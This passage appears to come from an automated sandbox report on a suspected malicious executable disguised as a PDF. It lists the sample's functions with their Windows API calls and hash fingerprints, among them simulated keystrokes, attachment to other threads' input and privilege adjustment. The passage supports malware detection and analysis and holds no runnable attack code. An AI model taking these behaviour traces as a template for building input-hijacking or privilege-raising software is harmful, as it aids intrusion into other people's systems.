                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 4705a91b01dc7ac733b4a0ffcc16be915000c7c88c4f4ad46126b5588636ab11
                                                            • Instruction ID: f09b0f7df669c07f26e943bab559f59db3fcf491af387e4b41bb6bffce62b214
                                                            • Opcode Fuzzy Hash: 4705a91b01dc7ac733b4a0ffcc16be915000c7c88c4f4ad46126b5588636ab11
                                                            • Instruction Fuzzy Hash: 0B116631201B089FD3308F05C888B66B7E8EF44721F14C92EE6AA86A50D7B0E945DF60
                                                            Function 000FC6DC Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp
                                                            • String ID:
                                                            • API String ID: 856254489-0
                                                            • Opcode ID: 7ad38ed2c164e384c30cff657af2304f148dfbf7bdabfef63d65c63d891766b0
                                                            • Instruction ID: aa2112626c8cdc150de34aaf19cdbd872cf5197b8907cbc2fac21a0c1552f74f
                                                            • Opcode Fuzzy Hash: 7ad38ed2c164e384c30cff657af2304f148dfbf7bdabfef63d65c63d891766b0
                                                            • Instruction Fuzzy Hash: 1E01D671D082595FEB159F28C851ABAFBB5EF56310F054096E850ABAA1D3349C42DB80
                                                            Function 00114A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 00114AD6
                                                              • Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 7c7820a63f0de33e7722c9a7f2574c547e42e3ca5bb45ac5e73bfadf0dc32eeb
                                                            • Instruction ID: 65799b4985db4e85b2d4216af2062f9a2e9afe94b7163cda27757082e301f7ff
                                                            • Opcode Fuzzy Hash: 7c7820a63f0de33e7722c9a7f2574c547e42e3ca5bb45ac5e73bfadf0dc32eeb
                                                            • Instruction Fuzzy Hash: D9F02231800209ABDF69AF74CC023DF36A0AF10725F058134F424AB0D1CB788AD1CF99
                                                            Function 000F4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4FDE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: a7bf0f9fc0bad77ac4a798262b8473b91d08303b89a924fddf7a62c8c72edce0
                                                            • Instruction ID: 8d7cfc54b58442f2b8bdea016f18422b95b21721d83da407ab89cf417147ed17
                                                            • Opcode Fuzzy Hash: a7bf0f9fc0bad77ac4a798262b8473b91d08303b89a924fddf7a62c8c72edce0
                                                            • Instruction Fuzzy Hash: 85F01C7150571ACFC7749F64E494827BBF1BF143253208A3EEADA82A10C7319888EB50
                                                            Function 001109D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001109F4
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: 9f52941274f2ea8e9198b1bbbddff05b2d6e9c69bcba330c58cfb2bccfbf3be6
                                                            • Instruction ID: fbfcf260f2b8732f159d6542fd8447c04841e5e7590f95e97a14976951f7f3cd
                                                            • Opcode Fuzzy Hash: 9f52941274f2ea8e9198b1bbbddff05b2d6e9c69bcba330c58cfb2bccfbf3be6
                                                            • Instruction Fuzzy Hash: 8DE0CD3690422C57C720D6589C05FFA77FDDF88790F0401B5FD0CD7215D9609CD18691
                                                            Function 00159129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                            • Instruction ID: bc22df5db0ee366523990fdbe911dc47b539c911a4129fac5d9ab11ff5ca3385
                                                            • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                            • Instruction Fuzzy Hash: DAE092B0104B00DFD7388A24D8507E373E1AB16315F00081CF6AA87341EB6278458B59
                                                            Function 0011098A Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001109F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath
                                                            • String ID:
                                                            • API String ID: 82841172-0
                                                            • Opcode ID: 259fc9d3ceae97b582e2f5da896be292e0e71e2f24735053c307c563dd1443a6
                                                            • Instruction ID: 927bfe6f6a6f083c7152bdbd9b6163ec1fc0541296b0ea898156cd6872b0cc1f
                                                            • Opcode Fuzzy Hash: 259fc9d3ceae97b582e2f5da896be292e0e71e2f24735053c307c563dd1443a6
                                                            • Instruction Fuzzy Hash: 3DD02B739000184F87208668E801AF43369DB4922070402E9FC0CC7117C9604C818680
                                                            Function 000F5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0012E16B,?,?,00000000), ref: 000F5DBF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 7b277a992631e650a3004ed1d930a722ad978bed14ba79f6de9cbbc28f285916
                                                            • Instruction ID: 4bc575f2160a7c7783bf7c42f6642829e73368a2bdf447912773e99d28ae4756
                                                            • Opcode Fuzzy Hash: 7b277a992631e650a3004ed1d930a722ad978bed14ba79f6de9cbbc28f285916
                                                            • Instruction Fuzzy Hash: 1AD0C77464020CBFE710DB80DC46FAA777CE705710F500194FD0456690D6B27D908795
                                                            Function 0011548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: c8c77840a47c664caa81f564794db8fbfd9d72ac46931c5a7ff20c1c3d0a6ff5
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: 73B0927684020CB7DF012E82EC02A993B1A9B90678F808020FB0C18562A673A6A09689
                                                            Function 0015D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 0015D46A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 361bba4beac496ea59f3137ec911f06da2929f9cb6f2a380ad15c05a62dd7f2c
                                                            • Instruction ID: 67953247ed1ece6889d6733f0f2ebf172ed5eb3a5046699dbb47a2cb8da9f265
                                                            • Opcode Fuzzy Hash: 361bba4beac496ea59f3137ec911f06da2929f9cb6f2a380ad15c05a62dd7f2c
                                                            • Instruction Fuzzy Hash: A7717330208705CFC714EF24D491AAAB7E0BF88315F04456DFAA68B6A2DB70ED49DB53
                                                            Function 00110E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 13b12f3aab1e64ee96384f7eeeb5c8730ca14356c794b880665f9ecb9f02b510
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: E931D370A01106DBC71EDF59C4809A9F7A6FF5D300B658AA9E409CB651E7B1EEC1CBC0
                                                            Function 036E22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 036E22B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: d5487aea65d8a3c42d1fc258f97690f9cc80c2092090a683a39fdbcdf493d11d
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: ACE0E67494110EDFDB00EFB8D54969E7FB4EF04701F1005A1FD01D2280D6309D508A72

                                                            Non-executed Functions

                                                            Function 0017CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0017CE50
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0017CE91
                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0017CED6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0017CF00
                                                            • SendMessageW.USER32 ref: 0017CF29
                                                            • _wcsncpy.LIBCMT ref: 0017CFA1
                                                            • GetKeyState.USER32(00000011), ref: 0017CFC2
                                                            • GetKeyState.USER32(00000009), ref: 0017CFCF
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0017CFE5
                                                            • GetKeyState.USER32(00000010), ref: 0017CFEF
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0017D018
                                                            • SendMessageW.USER32 ref: 0017D03F
                                                            • SendMessageW.USER32(?,00001030,?,0017B602), ref: 0017D145
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0017D15B
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0017D16E
                                                            • SetCapture.USER32(?), ref: 0017D177
                                                            • ClientToScreen.USER32(?,?), ref: 0017D1DC
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0017D1E9
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0017D203
                                                            • ReleaseCapture.USER32 ref: 0017D20E
                                                            • GetCursorPos.USER32(?), ref: 0017D248
                                                            • ScreenToClient.USER32(?,?), ref: 0017D255
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0017D2B1
                                                            • SendMessageW.USER32 ref: 0017D2DF
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0017D31C
                                                            • SendMessageW.USER32 ref: 0017D34B
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0017D36C
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0017D37B
                                                            • GetCursorPos.USER32(?), ref: 0017D39B
                                                            • ScreenToClient.USER32(?,?), ref: 0017D3A8
                                                            • GetParent.USER32(?), ref: 0017D3C8
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0017D431
                                                            • SendMessageW.USER32 ref: 0017D462
                                                            • ClientToScreen.USER32(?,?), ref: 0017D4C0
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0017D4F0
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0017D51A
                                                            • SendMessageW.USER32 ref: 0017D53D
                                                            • ClientToScreen.USER32(?,?), ref: 0017D58F
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0017D5C3
                                                              • Part of subcall function 000F25DB: GetWindowLongW.USER32(?,000000EB), ref: 000F25EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0017D65F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F
                                                            • API String ID: 3977979337-4164748364
                                                            • Opcode ID: 60e73bf0c03b205af862ca561e61cb6f342d422c3b430dd732f3b9549c06998d
                                                            • Instruction ID: 1c2fe9f2176aa616d99e1e744f3740c37530f5ae59f16e9728603c4b066c9d52
                                                            • Opcode Fuzzy Hash: 60e73bf0c03b205af862ca561e61cb6f342d422c3b430dd732f3b9549c06998d
                                                            • Instruction Fuzzy Hash: 27429C70204345AFC725CF28C884EAABFF5FF48714F14862DF699976A1CB319991CB92
                                                            Function 0017804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0017873F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 3850602802-328681919
                                                            • Opcode ID: 21154f6f727f9455c43f330a031f3ac905da3e48e1c2a5120081ef700b1f0c77
                                                            • Instruction ID: 388157a8fe9a815341159c293796d052b05614de5750ec3aa4ca01b9f90b4a8e
                                                            • Opcode Fuzzy Hash: 21154f6f727f9455c43f330a031f3ac905da3e48e1c2a5120081ef700b1f0c77
                                                            • Instruction Fuzzy Hash: 7612A371580244ABEB299F28CC4DFAB7BB4EF49710F208169F91EDA1E1DF709981CB50
                                                            Function 0010710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                            • API String ID: 1357608183-1798697756
                                                            • Opcode ID: 9cf5b8e1104fd999433e1aecacd9d81a1b50bc96a1d92e335cd36ecdb2d3a85c
                                                            • Instruction ID: a4cb0dc1bc56db4b88b8165b2ef3250c425d96f8587e6bd440780b4084440b53
                                                            • Opcode Fuzzy Hash: 9cf5b8e1104fd999433e1aecacd9d81a1b50bc96a1d92e335cd36ecdb2d3a85c
                                                            • Instruction Fuzzy Hash: F3939171E04216DBDB28CF98C881BADB7B1FF48710F65816AE955EB2D0E7709E81CB50
                                                            Function 000F4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 000F4A3D
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0012DA8E
                                                            • IsIconic.USER32(?), ref: 0012DA97
                                                            • ShowWindow.USER32(?,00000009), ref: 0012DAA4
                                                            • SetForegroundWindow.USER32(?), ref: 0012DAAE
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0012DAC4
                                                            • GetCurrentThreadId.KERNEL32 ref: 0012DACB
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0012DAD7
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0012DAE8
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0012DAF0
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0012DAF8
                                                            • SetForegroundWindow.USER32(?), ref: 0012DAFB
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB10
                                                            • keybd_event.USER32(00000012,00000000), ref: 0012DB1B
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB25
                                                            • keybd_event.USER32(00000012,00000000), ref: 0012DB2A
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB33
                                                            • keybd_event.USER32(00000012,00000000), ref: 0012DB38
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB42
                                                            • keybd_event.USER32(00000012,00000000), ref: 0012DB47
                                                            • SetForegroundWindow.USER32(?), ref: 0012DB4A
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0012DB71
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: 2e6a5b66633fe077ceb60012a9f27e7a46b180d2e62530f812b0b1699c2b1a9e
                                                            • Instruction ID: 4ff3e69a172eb928a70d50984325106fc16897be4249321998961fa9b0f7f520
                                                            • Opcode Fuzzy Hash: 2e6a5b66633fe077ceb60012a9f27e7a46b180d2e62530f812b0b1699c2b1a9e
                                                            • Instruction Fuzzy Hash: 06315571A403187FEB216F61EC4AF7F3E7CEB44B50F114029FA04EA1D0C6705991AAA1
                                                            Function 00148858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00148CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00148D0D
                                                              • Part of subcall function 00148CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00148D3A
                                                              • Part of subcall function 00148CC3: GetLastError.KERNEL32 ref: 00148D47
